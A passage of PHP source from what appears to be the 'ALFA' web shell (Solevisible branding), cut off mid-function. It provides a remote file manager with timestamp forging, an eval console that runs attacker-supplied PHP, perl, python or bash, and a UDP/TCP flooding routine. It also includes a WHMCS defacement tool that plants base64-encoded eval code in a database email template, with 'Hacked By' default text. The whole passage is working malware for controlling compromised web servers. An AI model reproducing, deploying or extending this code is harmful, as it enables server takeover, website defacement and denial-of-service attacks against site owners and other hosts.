function alfaCmp($a, $b) {
if($GLOBALS['sort'][0] != 'size')
return strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]]))*($GLOBALS['sort'][1]?1:-1);
else
return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1);
}
usort($files, "alfaCmp");
usort($dirs, "alfaCmp");
$files = array_merge($dirs, $files);
$l=0;
$cc=0;
foreach($files as $f){
$f['name'] = htmlspecialchars($f['name']);
$newname = mb_strlen($f['name'], 'UTF-8')>60?mb_substr($f['name'], 0, 60, 'utf-8').'...':$f['name'];
$checkbox = 'checkbox'.$cc;
$raw_name = rawurlencode($f['name']);
$icon = $GLOBALS['DB_NAME']['show_icons']?'<img src="'.findicon($f['name'],$f['type']).'" width="30" height="30">':'';
$style = $GLOBALS['DB_NAME']['show_icons']?'position:relative;display:inline-block;bottom:12px;':'';
echo '<tr'.($l?' class=l1':'').'><td><div class="myCheckbox"><input type="checkbox" name="f[]" value="'.$raw_name.'" class="chkbx" id="'.$checkbox .'"><label for="'.$checkbox .'"></label></div></td><td>'.$icon.'<div style="'.$style.'"><a class="main_name" href=javascript:void(0) onclick="'.(($f['type']=='file')?'editor(\''.$raw_name.'\',\'auto\',\'\',\'\',\'\',\''.$f['type'].'\');">'.($GLOBALS['cwd'].$f['name']==$GLOBALS['__file_path']?"<span class='shell_name' style='font-weight:unset;'>".$f['name']."</span>":htmlspecialchars($newname)):'g(\'FilesMan\',\''.$f['path'].'\');" title=' . $f['link'] . '><b>| ' . htmlspecialchars($f['name']) . ' |</b>').'</a></td></div><td><span style="font-weight:unset;" class="main_size">'.(($f['type']=='file')?alfaSize($f['size']):$f['type']).'</span></td><td><span style="font-weight:unset;" class="main_modify">'.$f['modify'].'</span></td><td><span style="font-weight:unset;" class="main_owner_group">'.$f['owner'].'/'.$f['group'].'</span></td><td><a href=javascript:void(0) onclick="editor(\''.$raw_name.'\',\'chmod\',\'\',\'\',\'\',\''.$f['type'].'\')">'.
$f['perms'].'</td><td><a class="actions" href="javascript:void(0);" onclick="editor(\''.$raw_name.'\', \'rename\',\'\',\'\',\'\',\''.$f['type'].'\')">R</a> <a class="actions" href="javascript:void(0);" onclick="editor(\''.$raw_name.'\', \'touch\',\'\',\'\',\'\',\''.$f['type'].'\')">T</a>'.(($f['type']=='file')?' <a class="actions" href="javascript:void(0);" onclick="editor(\''.$raw_name.'\', \'edit\',\'\',\'\',\'\',\''.$f['type'].'\')">E</a> <a class="actions" href="javascript:void(0);" onclick="g(\'FilesTools\',null,\''.$raw_name.'\', \'download\')">D</a>':'').'<a class="actions" href="javascript:void(0);" onclick="var chk = confirm(\'Are You Sure For Delete # '.addslashes(rawurldecode($f['name'])).' # ?\'); chk ? g(\'FilesMan\',null,\'delete\', \''.$raw_name.'\') : \'\';"> X </a></td></tr>';
$l = $l?0:1;
$cc++;
}
echo "<tr><td colspan=7>
<input type=hidden name=a value='FilesMan'>
<input type=hidden name=c value='".htmlspecialchars((isset($GLOBALS['glob_chdir_false'])?$_POST['c']:$GLOBALS['cwd']))."'>
<input type=hidden name=charset value='". (isset($_POST['charset'])?$_POST['charset']:'')."'>
<select id='tools_selector' name='alfa1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete' selected>Delete</option><option value='zip'>Add 2 Compress (zip)</option><option value='unzip'>Add 2 Uncompress (zip)</option><option value='paste'>Paste / Zip / Unzip </option></select>
<input type='submit' value=' '>
</form></table></div></div>";
alfafooter();
}
function alfaFilesTools(){
alfahead();
echo '<div class="filestools">';
if(isset($_POST['alfa1']))$_POST['alfa1'] = rawurldecode($_POST['alfa1']);
$alfa1_decoded = $_POST['alfa1'];
$chdir_fals = false;
if(!@chdir($_POST['c'])){
	$chdir_fals = true;
	$_POST['alfa1'] = $_POST["c"]."/".$_POST["alfa1"];
	$alfa_canruncmd = _alfa_can_runCommand(true,true);
	if($alfa_canruncmd){
		$slashed_alfa1 = addslashes($_POST['alfa1']);
		$file_info = explode(":", alfaEx('stat -c "%F:%U:%G:%s:%Y:0%a:%A" "'.$slashed_alfa1.'"'));
		$perm_color_class = alfaEx("if [[ -w '".$slashed_alfa1."' ]]; then echo main_green_perm; elif [[ -r '".$slashed_alfa1."' ]]; then echo main_white_perm; else echo main_red_perm; fi");
	}
}
if($_POST['alfa2'] == 'auto'){
if(is_array(@getimagesize($_POST['alfa1']))){
$_POST['alfa2'] = 'image';
}else{
	$_POST['alfa2'] = 'view';
	if($chdir_fals){
		if($alfa_canruncmd){
			$mime = explode(":", alfaEx("file --mime-type '".addslashes($_POST['alfa1'])."'"));
			$mimetype = $mime[1];
			if(!empty($mimetype)){
				if(strstr($mimetype, "image")){
					$_POST['alfa2'] = 'image';
				}
			}
		}
	}
}
}
if($_POST['alfa2'] == "rename" && !empty($_POST['alfa3']) && @is_writable($_POST['alfa1'])){$rename_cache = $_POST['alfa3'];}
if(@$_POST['alfa2'] == 'mkfile'){
$_POST['alfa1'] = trim($_POST['alfa1']);
if($chdir_fals&&$alfa_canruncmd){
	if(_alfa_is_writable($_POST["c"])){
		alfaEx("cd '".addslashes($_POST["c"])."';touch '".addslashes($alfa1_decoded)."'");
		$_POST['alfa2'] = "edit";
	}
}
if(!@file_exists($_POST['alfa1'])){
$fp = @fopen($_POST['alfa1'], 'w');
if($fp){
$_POST['alfa2'] = "edit";
fclose($fp);
}
}else{
$_POST['alfa2'] = "edit";
}
}
if(!_alfa_file_exists(@$_POST['alfa1'])){
echo __pre()."<center><p><div class=\"txtfont\"><font color='red'>!...FILE DOEST NOT EXITS...!</font></div></p></center></div><script>editor_error=false;removeHistory('".$_POST['alfa4']."');</script>";
alfaFooter();
return;
}
if($chdir_fals){
$filesize = $file_info[3];
$uid["name"] = $file_info[1];
$gid["name"] = $file_info[2];
$permcolor = alfaPermsColor(array("class"=>$perm_color_class,"num"=>$file_info[5],"human"=>$file_info[6]),true);
}else{
$uid = function_exists("posix_getpwuid")&&function_exists("fileowner")?@posix_getpwuid(@fileowner($_POST['alfa1'])):'';
$gid = function_exists("posix_getgrgid")&&function_exists("filegroup")?@posix_getgrgid(@filegroup($_POST['alfa1'])):'';
if(!$uid&&!$gid){
$uid['name'] = function_exists("fileowner")?@fileowner($_POST['alfa1']):'';
$gid['name'] = function_exists("filegroup")?@filegroup($_POST['alfa1']):'';
}
$permcolor = alfaPermsColor($_POST['alfa1']);
$filesize = @filesize($_POST['alfa1']);
if(!isset($uid['name'],$gid['name'])||empty($uid['name'])||empty($gid['name'])){
	if(_alfa_can_runCommand()){
		list($uid['name'],$gid['name']) = explode(":", alfaEx('stat -c "%U:%G" "'.addslashes($_POST["c"]."/".$_POST["alfa1"]).'"'));
	}
}
}
echo '<span class="editor_file_info_vars">Name:</span> '.htmlspecialchars($alfa1_decoded).' <span class="editor_file_info_vars">Size:</span> '.alfaSize($filesize).' <span class="editor_file_info_vars">Permission:</span> '.$permcolor.' <span class="editor_file_info_vars">Owner/Group:</span> '.$uid['name'].'/'.$gid['name'].' <span class="editor_file_info_vars">Directory:</span> '.str_replace("//", "/",($chdir_fals?"":$_POST['c'].'/').$_POST['alfa1']).'<br><br>';
if(empty($_POST['alfa2']))$_POST['alfa2'] = 'view';
if(!_alfa_is_dir($_POST['alfa1'])){
$m = array('View', 'Edit', 'Download', 'Highlight', 'Chmod', 'Rename', 'Touch', 'Delete', 'Image', 'Hexdump');
$ftype = "file";
}else{
$m = array('Chmod', 'Rename', 'Touch');
$ftype = "dir";
}
foreach($m as $v)
echo $v == 'Delete' ? '<a href="javascript:void(0);" onclick="var chk=confirm(\'Are You Sure For Delete This File ?\');chk?editor(\''.addslashes(!isset($rename_cache)?$_POST['alfa1']:$rename_cache).'\',\''.strtolower($v).'\',\'\',\''.$_POST['c'].'\',\''.$_POST['alfa4'].'\',\''.$ftype.'\'):\'\';"><span class="editor_actions">'.((strtolower($v)==@$_POST['alfa2'])?'<b><span class="editor_actions"> '.$v.' </span> </b>':$v).' | </span></a> ' : '<a href="javascript:void(0);" onclick="editor(\''.addslashes(!isset($rename_cache)?$_POST['alfa1']:$rename_cache).'\',\''.strtolower($v).'\',\'\',\''.$_POST['c'].'\',\''.$_POST['alfa4'].'\',\''.$ftype.'\')"><span class="editor_actions">'.((strtolower($v)==@$_POST['alfa2'])?'<b><span class="editor_actions"> '.$v.' </span> </b>':$v).' | </span></a>';
echo '<br><br>';
switch($_POST['alfa2']){
case 'view':
@chdir($_POST['c']);
echo '<div class="editor-view"><div class="view-content"><p><button style="border-radius:10px;" class="button" onClick="copyToClipboard(\'view_ml_content\');">copy to clipboard</button></p><pre class="ml1" id="view_ml_content">';
echo htmlspecialchars(__read_file($_POST['alfa1']));
echo '</pre></div></div>';
break;
case 'highlight':
@chdir($_POST['c']);
if(@is_readable($_POST['alfa1'])){
echo '<div class="editor-view"><div class="view-content"><div class="ml1" style="background-color: #e1e1e1;color:black;">';
$code = @highlight_file($_POST['alfa1'],true);
echo str_replace(array('<span ','</span>'), array('<font ','</font>'),$code).'</div></div></div>';
}
break;
case 'delete':
@chdir($_POST['c']);
if(@is_writable($_POST['alfa1'])||isset($GLOBALS["glob_chdir_false"])){
$deleted = true;
if(!@unlink($_POST['alfa1'])){
	$deleted = false;
	if($alfa_canruncmd){
		if(_alfa_is_writable($_POST['alfa1'])){
			alfaEx("rm -f '".addslashes($_POST['alfa1'])."'");
			$deleted = true;
		}
	}
}
if($deleted)echo 'File Deleted...<script>var elem = $("'.$_POST['alfa4'].'").parentNode;elem.parentNode.removeChild(elem);delete editor_files["'.$_POST['alfa4'].'"];</script>';else echo 'Error...';}
break;
case 'chmod':
@chdir($_POST['c']);
if(!empty($_POST['alfa3'])){
$perms = 0;
for($i=strlen($_POST['alfa3'])-1;$i>=0;--$i)
$perms += (int)$_POST['alfa3'][$i]*pow(8, (strlen($_POST['alfa3'])-$i-1));
if(!@chmod($_POST['alfa1'], $perms)){
if($chdir_fals&&$alfa_canruncmd){
alfaEx("cd '".addslashes($_POST["c"])."';chmod ".addslashes($_POST['alfa3'])." '".addslashes($alfa1_decoded)."'");
echo('Success!');
}else{
echo '<font color="#FFFFFF"><b>Can\'t set permissions!</b></font><br><script>document.mf.alfa3.value="";</script>';}
}else{echo('Success!');}
}
clearstatcache();
AlfaNum(8,9,10,7,6,5,4,2,1);
if($chdir_fals){
	$file_perm = $file_info[5];
}else{
	$file_perm = substr(sprintf('%o', @fileperms($_POST['alfa1'])),-4);
}
echo '<script>alfa3_="";</script><form onsubmit="editor(\''.addslashes($_POST['alfa1']).'\',\''.$_POST['alfa2'].'\',this.chmod.value,\''.$_POST['c'].'\',\''.$_POST['alfa4'].'\',\''.$ftype.'\');return false;"><input type="text" name="chmod" value="'.$file_perm.'"><input type=submit value=" "></form>';
break;
case 'edit':
@chdir($_POST['c']);
if(!@is_writable($_POST['alfa1'])&&!_alfa_is_writable($_POST['alfa1'])){
echo 'File isn\'t writeable';
break;
}
if(!empty($_POST['alfa3'])){
$_POST['alfa3'] = substr($_POST['alfa3'],1);
$time = @filemtime($_POST['alfa1']);
$fp = @__write_file($_POST['alfa1'],$_POST['alfa3']);
if($chdir_fals&&$alfa_canruncmd){
	$rname = $alfa1_decoded;
	$randname = $rname.rand(111,9999);
	$filepath = dirname($_SERVER["SCRIPT_FILENAME"])."/".$randname;
	if($fp = @__write_file($filepath ,$_POST['alfa3'])){
		alfaEx("mv '".addslashes($filepath)."' '".addslashes($_POST["alfa1"])."';rm -f '".addslashes($filepath)."'");
	}
}
if($fp){
echo 'Saved!<br><script>alfa3_="";</script>';
@touch($_POST['alfa1'],$time,$time);
}
}
echo '<button class="button" style="border-radius:10px;" onClick="copyToClipboard(\'edit_textarea_content\');">copy to clipboard</button><form id="editor_edit_area" onsubmit="editor(\''.addslashes($alfa1_decoded).'\',\''.$_POST['alfa2'].'\',\'1\'+this.text.value,\''.$_POST['c'].'\',\''.$_POST['alfa4'].'\',\''.$ftype.'\');return false;"><p><input type="submit" value=" "></p><textarea name="text" id="edit_textarea_content" class="bigarea" onkeydown="saveByKey(event);">';
echo htmlspecialchars(__read_file($_POST['alfa1']));
echo '</textarea><p><input type="submit" value=" "></p></form>';
break;
case 'hexdump':
@chdir($_POST['c']);
$c = __read_file($_POST['alfa1']);
$n = 0;
$h = array('00000000<br>','','');
$len = strlen($c);
for ($i=0; $i<$len; ++$i) {
$h[1] .= sprintf('%02X',ord($c[$i])).' ';
switch ( ord($c[$i]) ) {
case 0: $h[2] .= ' '; break;
case 9: $h[2] .= ' '; break;
case 10: $h[2] .= ' '; break;
case 13: $h[2] .= ' '; break;
default: $h[2] .= $c[$i]; break;
}
$n++;
if ($n == 32) {
$n = 0;
if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'<br>';}
$h[1] .= '<br>';
$h[2] .= "\n";
}
}
echo '<div class="editor-view"><div class="view-content"><table cellspacing=1 cellpadding=5 bgcolor=black><tr><td bgcolor=gray><span style="font-weight: normal;"><pre>'.$h[0].'</pre></span></td><td bgcolor=#282828><pre>'.$h[1].'</pre></td><td bgcolor=#333333><pre>'.htmlspecialchars($h[2]).'</pre></td></tr></table></div></div>';
break;
case 'rename':
@chdir($_POST['c']);
$alfa1_escape = addslashes($_POST["alfa1"]);
$alfa3_escape = addslashes($_POST["alfa3"]);
if(!empty($_POST['alfa3'])){
$cmd_rename = false;
if($chdir_fals&&$alfa_canruncmd){
if(_alfa_is_writable($_POST['alfa1'])){
$alfa1_escape = addslashes($alfa1_decoded);
alfaEx("cd '".addslashes($_POST['c'])."';mv '".$alfa1_escape."' '".addslashes($_POST['alfa3'])."'");
}else{
$cmd_rename = true;
}
}else{
$alfa1_escape = addslashes($_POST["alfa1"]);
}
if(!@rename($_POST['alfa1'], $_POST['alfa3'])&&$cmd_rename){
echo 'Can\'t rename!<br>';}else{echo('Renamed!<script>try{$("'.$_POST['alfa4'].'").innerHTML = "<div class=\'editor-icon\'>"+loadType(\''.$alfa3_escape.'\',\''.$ftype.'\',\''.$_POST['alfa4'].'\')+"</div><div class=\'editor-file-name\'>'.$alfa3_escape.'</div>";editor_files["'.$_POST['alfa4'].'"].file = "'.$alfa3_escape.'";d.files.innerHTML = d.files.innerHTML.replace(/\\\''.$alfa1_escape.'\\\'/g, "\''.$alfa3_escape.'\'");d.files.innerHTML = d.files.innerHTML.replace(/value\=\"'.$alfa1_escape.'\"/, \'value\=\"'.$alfa3_escape.'\"\');d.files.innerHTML = d.files.innerHTML.replace(/'.$alfa1_escape.'\<\/a\>/g, "'.$alfa3_escape.'</a>");d.files.innerHTML = d.files.innerHTML.replace(/Are You Sure For Delete # '.$alfa1_escape.' # \?/, "Are You Sure For Delete # '.$alfa3_escape.' # ?");'.($ftype == "dir"?"updateDirsEditor('".$_POST['alfa4']."','".$alfa1_escape."');":"").'}catch(e){console.log(e)}</script>');$alfa1_escape = $alfa3_escape;}
}
echo '<form onsubmit="editor(\''.$alfa1_escape.'\',\''.$_POST['alfa2'].'\',this.name.value,\''.$_POST['c'].'\',\''.$_POST['alfa4'].'\',\''.$ftype.'\');return false;"><input type="text" name="name" value="'.addslashes(htmlspecialchars(isset($_POST['alfa3'])&&$_POST['alfa3']!=''?$_POST['alfa3']:$alfa1_decoded)).'"><input type=submit value=" "></form>';
break;
case 'touch':
@chdir($_POST['c']);
if( !empty($_POST['alfa3']) ) {
$time = strtotime($_POST['alfa3']);
if($time){
$touched = false;
if($chdir_fals&&$alfa_canruncmd){
	alfaEx("cd '".addslashes($_POST["c"])."';touch -d '".htmlspecialchars(addslashes($_POST['alfa3']))."' '".addslashes($alfa1_decoded)."'");
	$touched = true;
}
if(!@touch($_POST['alfa1'],$time,$time)&&!$touched)
echo 'Fail!';
else
echo 'Touched!';
} else echo 'Bad time format!';
}
clearstatcache();
echo '<script>alfa3_="";</script><form onsubmit="editor(\''.addslashes($_POST['alfa1']).'\',\''.$_POST['alfa2'].'\',this.touch.value,\''.$_POST['c'].'\',\''.$_POST['alfa4'].'\',\''.$ftype.'\');return false;"><input type=text name=touch value="'.date("Y-m-d H:i:s", ($chdir_fals?$file_info[4]:@filemtime($_POST['alfa1']))).'"><input type=submit value=" "></form>';
break;
case 'image':
@chdir($_POST['c']);
echo('<hr>');
$file = $_POST['alfa1'];
$image_info = @getimagesize($file);
if(is_array($image_info)||$chdir_fals){
$width = (int)$image_info[0];
$height = (int)$image_info[1];
if($chdir_fals&&$alfa_canruncmd){
	$source = alfaEx("cat '".addslashes($file)."' | base64");
	list($width, $height) = explode(":", alfaEx("identify -format '%w:%h' '".addslashes($file)."'"));
	$mime = explode(":", alfaEx("file --mime-type '".addslashes($file)."'"));
	$image_info['mime'] = $mime[1];
}else{
	$source = __ZW5jb2Rlcg(__read_file($file, false));
}
$image_info_h = "Image type = <span>[</span> ".$image_info['mime']." <span>]</span><br>Image Size = <span>[ </span>".$width." x ".$height."<span> ]</span><br>";
if($width > 800){$width = 800;}
echo $content = "<div class='editor-view'><div class='view-content'><center>".$image_info_h."<br><img id='viewImage' style='max-width:100%;border:1px solid green;' src='data:".$image_info['mime'].";base64,".$source."' alt='".$file."'></center></div></div><br>";
}
break;
}
echo '</div>';
alfaFooter();
}
function findicon($file,$type){
$s = 'http://solevisible.com/icons/';
$types = array('json','ppt','pptx','xls','xlsx','msi','config','cgi','pm','c','cpp','cs','java','aspx','asp','db','ttf','eot','woff','woff2','woff','conf','log','apk','cab','bz2','tgz','dmg','izo','jar','7z','iso','rar','bat','sh','alfa','gz','tar','php','php4','php5','phtml','html','xhtml','shtml','htm','zip','png','jpg','jpeg','gif','bmp','ico','txt','js','rb','py','xml','css','sql','htaccess','pl','ini','dll','exe','mp3','mp4','m4a','mov','flv','swf','mkv','avi','wmv','mpg','mpeg','dat','pdf','3gp','doc','docx','docm');
if($type!='file'){
return ($file=='..'?$s.'back.png':$s.'folder.png');
}else{
$ext = explode('.',$file);
$ext = end($ext);
$ext = strtolower($ext);
return (in_array($ext,$types)?$s.$ext.'.png':$s.'notfound.png');
}
}
function alfadlfile(){
if(isset($_POST['c'],$_POST['file'])){
$basename = rawurldecode(basename($_POST['file']));
$_POST['file'] = str_replace("//", "/", $_POST['c'].'/'.$basename);
$alfa_canruncmd = _alfa_can_runCommand(true,true);
if(@is_file($_POST['file']) && @is_readable($_POST['file']) || $alfa_canruncmd){
ob_start("ob_gzhandler", 4096);
header("Content-Disposition: attachment; filename=\"".addslashes($basename)."\"");
header("Content-Type: application/octet-stream");
if(isset($GLOBALS["glob_chdir_false"])){
	$randname = $basename.rand(111,9999);
	$scriptpath = dirname($_SERVER["SCRIPT_FILENAME"]);
	$filepath = $scriptpath."/".$randname;
	if(_alfa_is_writable($scriptpath)){
		alfaEx("cp '".addslashes($_POST["file"])."' '".addslashes($filepath)."'");
		readfile($filepath);
		@unlink($filepath);
	}else{
		alfaEx("cat '".addslashes($_POST["file"])."'");
	}
}else{
	readfile($_POST['file']);
}
}else echo('Error...!');}}
function alfaphpeval(){
alfahead();
if(isset($_POST['alfa2']) && ($_POST['alfa2'] == 'ini')){
echo '<div class=header>';
ob_start();
$INI=ini_get_all();
print '<table border=0><tr>'
.'<td class="listing"><font class="highlight_txt">Param</td>'
.'<td class="listing"><font class="highlight_txt">Global value</td>'
.'<td class="listing"><font class="highlight_txt">Local Value</td>'
.'<td class="listing"><font class="highlight_txt">Access</td></tr>';
foreach ($INI as $param => $values)
print "\n".'<tr>'
.'<td class="listing"><b>'.$param.'</td>'
.'<td class="listing">'.$values['global_value'].' </td>'
.'<td class="listing">'.$values['local_value'].' </td>'
.'<td class="listing">'.$values['access'].' </td></tr>';
$tmp = ob_get_clean();
$tmp = preg_replace('!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU','',$tmp);
$tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp);
echo str_replace('<h1','<h2', $tmp) .'</div><br>';
}
if(isset($_POST['alfa2']) && ($_POST['alfa2'] == 'info')) {
echo '<div class=header><style>.p {color:#000;}</style>';
ob_start();
phpinfo();
$tmp = ob_get_clean();
$tmp = preg_replace('!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU','',$tmp);
$tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp);
echo str_replace('<h1','<h2', $tmp) .'</div><br>';
}
if(isset($_POST['alfa2']) && ($_POST['alfa2'] == 'exten')) {
echo '<div class=header>';
ob_start();
$EXT=get_loaded_extensions();
echo '<table border=0><tr><td class="listing">'.implode('</td></tr>'."\n".'<tr><td class="listing">', $EXT).'</td></tr></table>'.count($EXT).' extensions loaded';
echo '</div><br>';
}
$lang_html = "";
foreach(array("php"=>"php ~> [ Windows / Linux ]","perl"=>"perl ~> [ Linux ]","python"=>"python ~> [ Linux ]","bash"=>"bash ~> [ Linux ]") as $key=>$val){$lang_html .= '<option value="'.$key.'" '.($_POST["alfa3"]==$key?"selected":"").'>'.$val.'</option>';}
echo '<div class=header><Center><a href=javascript:void(0) onclick="g(\'phpeval\',null,\'\',\'ini\')">| INI_INFO | </a><a href=javascript:void(0) onclick="g(\'phpeval\',null,\'\',\'info\')"> | phpinfo |</a><a href=javascript:void(0) onclick="g(\'phpeval\',null,\'\',\'exten\')"> | extensions |</a></center><br><form name=pf method=post onsubmit="g(\'phpeval\',null,this.code.value,null,this.language.value); return false;"><div class="txtfont">Select Language: </div> <select name="language" style="width:300px;">'.$lang_html.'</select><br><br><textarea placeholder="file_get_contents(\'/etc/passwd\');" name=code class=bigarea id=PhpCode>'.(!empty($_POST['alfa1'])?htmlspecialchars($_POST['alfa1']):'').'</textarea><center><input type="submit" value="" style="margin-top:5px"></center>';
echo '</form><pre id=PhpOutput style="'.(empty($_POST['alfa1'])?'display:none;':'').'margin-top:5px;" class=ml1>';
if(!empty($_POST['alfa1'])){
if($_POST['alfa3']=="php"){
ob_start();
eval($_POST['alfa1']);
$result = htmlspecialchars(ob_get_clean());
}elseif(_alfa_can_runCommand()&&$GLOBALS["sys"]=="unix"){
	if(isset($_SESSION["eval_tmpdir"])){
		$tempdir = $_SESSION["eval_tmpdir"];
	}else{
		$tempdir = dirname(alfaEx("mktemp"));
		$_SESSION["eval_tmpdir"] = $tempdir;
	}
	$lang = $_POST['alfa3'];
	$filename = "temp".rand(11111,99999);
	$temp = $tempdir."/".$filename ;
	__write_file($filename, $_POST['alfa1']);
	$result = alfaEx("mv {$filename} {$temp};{$lang} {$temp};rm -f {$temp}");
	@unlink($filename);
	@unlink($temp);
}
echo '<textarea class=bigarea id="PhpCode">'.$result.'</textarea>';
}
echo '</pre></div>';
alfafooter();
}
function alfahash(){
if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}}
if(!function_exists('full_urlencode')) {function full_urlencode($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= '%'.dechex(ord($p[$i]));return strtoupper($r);}}
$stringTools = array(
'Base64_encode ( $string )' => '__ZW5jb2Rlcg($s)',
'Base64_decode ( $string )' => '__ZGVjb2Rlcg($s)',
'strrev ( $string )' => 'strrev($s)',
'bin2hex ( $string )' => 'bin2hex($s)',
'hex2bin ( $string )' => 'hex2bin($s)',
'md5 ( $string )' => 'md5($s)',
'sha1 ( $string )' => 'sha1($s)',
'hash ( "sha251", $string ) --> sha251' => 'hash("sha256",$s)',
'hash ( "sha384", $string ) --> sha384' => 'hash("sha384",$s)',
'hash ( "sha512", $string ) --> sha512' => 'hash("sha512",$s)',
'crypt ( $string )' => 'crypt($s)',
'crc32 ( $string )' => 'crc32($s)',
'str_rot13 ( $string )' => 'str_rot13($s)',
'urlencode ( $string )' => 'urlencode($s)',
'urldecode  ( $string )' => 'urldecode($s)',
'full_urlencode  ( $string )' => 'full_urlencode($s)',
'htmlspecialchars  ( $string )' => 'htmlspecialchars($s)',
'base64_encode (gzdeflate( $string , 9)) --> Encode' => '__ZW5jb2Rlcg(gzdeflate($s, 9))',
'gzinflate (base64_decode( $string )) --> Decode' => '@gzinflate(__ZGVjb2Rlcg($s))',
'str_rot13 (base64_encode( $string )) --> Encode' => 'str_rot13(__ZW5jb2Rlcg($s))',
'base64_decode (str_rot13( $string )) --> Decode' => '__ZGVjb2Rlcg(str_rot13($s))',
'str_rot13 (base64_encode(gzdeflate( $string , 9))) --> Encode' => 'str_rot13(__ZW5jb2Rlcg(gzdeflate($s,9)))',
'gzinflate (base64_decode(str_rot13( $string ))) --> Decode' => '@gzinflate(__ZGVjb2Rlcg(str_rot13($s)))',
);
alfahead();
echo '<div class=header>';
echo "<form onSubmit='g(\"hash\",null,this.selectTool.value,this.input.value);return false;'><div class='txtfont'>Method:</div> <select name='selectTool' style='width:400px;'>";
foreach($stringTools as $k => $v)
echo "<option value='".htmlspecialchars($v)."' ".($_POST['alfa1']==$v?'selected':'').">".$k."</option>";
echo "</select> <input type='submit' value=' '/><br><textarea  name='input' style='margin-top:5px' class='bigarea'>".(empty($_POST['alfa1'])?'':htmlspecialchars(@$_POST['alfa2']))."</textarea></form>";
if(!empty($_POST['alfa1'])){
$string = addslashes($_POST['alfa2']);
$string = str_replace('\"','"',$string);
$alg = $_POST['alfa1'];
$code = str_replace('$s',"'".$string."'",$alg);
ob_start();
eval('echo '.$code.';');
$res = ob_get_contents();
ob_end_clean();
if(in_array($alg, $stringTools))echo '<textarea class="bigarea" id="PhpCode">'.htmlspecialchars($res).'</textarea>';
}
echo "</div>";
alfaFooter();
}
function alfados(){
alfahead();
echo '<div class=header>';
echo '<center><p><div class="txtfont_header">| DOS |</div></p><form onSubmit="g(\'dos\',null,this.host.value,this.time.value,this.port.value,this.m.value); return false;"><div class="txtfont">Method : <select name="m" style="width:80px;"><option value="udp">UDP</option><option value="tcp">TCP</option></select> Host : <input name="host" type="text" value="localhost" size="25" /> Time : <input name="time" type="text" size="15" /> Port : <input name="port" type="text" size="10" /> <input type="submit" value=" " /></div></form></center><br>';
if(!empty($_POST['alfa1']) && !empty($_POST['alfa2']) && !empty($_POST['alfa3'])){
echo __pre();
$packets=0;
ignore_user_abort(true);
$exec_time=(int)$_POST['alfa2'];
$time=time();
$max_time=$exec_time+$time;
$host=$_POST['alfa1'];
$port=(int)$_POST['alfa3'];
$method=$_POST['alfa4'];
$out = str_repeat('X',65000);
while(1){
$packets++;
if(time() > $max_time){
break;
}
$fp = @fsockopen($method.'://'.$host, $port, $errno, $errstr, 5);
if($fp){
fwrite($fp, $out);
fclose($fp);
}
}
echo "<center>$packets (" . @round(($packets*65)/1024, 2) . " MB) packets averaging ". @round($packets/$exec_time, 2) . " packets per second</center>";
echo "</pre>";
}
echo '</div>';
alfafooter();
}
function __pre(){return('<pre id="strOutput" style="margin-top:5px" class="ml1">');}
function alfaIndexChanger(){
alfahead();

echo '<div class=header><center><p><div class="txtfont_header">| Index Changer |</div></p><h3><a href=javascript:void(0) onclick="g(\'IndexChanger\',null,null,null,\'whmcs\')">| Whmcs | </a><a href=javascript:void(0) onclick="g(\'IndexChanger\',null,\'vb\',null)">| vBulletin | </a><a href=javascript:void(0) onclick="g(\'IndexChanger\',null,null,\'mybb\')">| MyBB | </a></h3></center>';
if(isset($_POST['alfa3'])&&($_POST['alfa3'] == 'whmcs')){
echo __pre();

echo "<center><center><div class='txtfont_header'>| Whmcs |</div>
<p><center>".getConfigHtml('whmcs')."<form onSubmit=\"g('IndexChanger',null,null,null,'whmcs',this.fname.value,this.path.value,this.dbu.value,this.dbn.value,this.dbp.value,this.dbh.value,this.index.value); return false;\">
";
$table = array('td1' =>
 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'inputName' => 'dbh', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),
 'td2' =>
 array('color' => 'FFFFFF', 'tdName' => 'URL', 'inputName' => 'path', 'inputValue' => 'http://site.com/whmcs', 'inputSize' => '50'),
 'td3' =>
 array('color' => 'FFFFFF', 'tdName' => 'File Name', 'inputName' => 'fname', 'inputValue' => '', 'inputSize' => '50'),
 'td4' =>
 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'inputName' => 'dbn', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),
 'td5' =>
 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'inputName' => 'dbu', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),
 'td6' =>
 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'inputName' => 'dbp', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50')
);
create_table($table);
echo "<br><div class='txtfont'>| Your Index |</div><br>
<textarea name=index rows='19' cols='103'><title>Hacked By Sole Sad & Invisible</title><b>Hacked By Sole Sad & Invisible</b></textarea><br>
<input type='submit' value=' '>
</form></center></center>";
if(isset($_POST['alfa6'])){
$s0levisible="Powered By Solevisible";
$dbu = $_POST['alfa6'];
$path = $_POST['alfa5'];
$fname = $_POST['alfa4'];
$dbn = $_POST['alfa7'];
$dbp = $_POST['alfa8'];
$dbh = $_POST['alfa9'];
$index = $_POST['alfa10'];
$index = str_replace("\'","'",$index);
$deface = '$x = base64_decode("'.__ZW5jb2Rlcg($index).'"); $solevisible = fopen("'.$fname.'","w"); fwrite($solevisible,$x);';
$saveData = __ZW5jb2Rlcg($deface);
$Def = '{php}eval(base64_decode("'.$saveData.'"));{/php}';
if(!empty($dbh)&&!empty($dbu)&&!empty($dbn)&&!empty($index)){
$conn=@mysqli_connect($dbh,$dbu,$dbp,$dbn) or die(mysqli_error($conn));
$soleSave=@mysqli_query($conn,"select message from tblemailtemplates where name='Password Reset Validation'");
$soleGet = mysqli_fetch_assoc($soleSave);
$tempSave1 = $soleGet['message'];
$tempSave = str_replace("'","\'",$tempSave1);
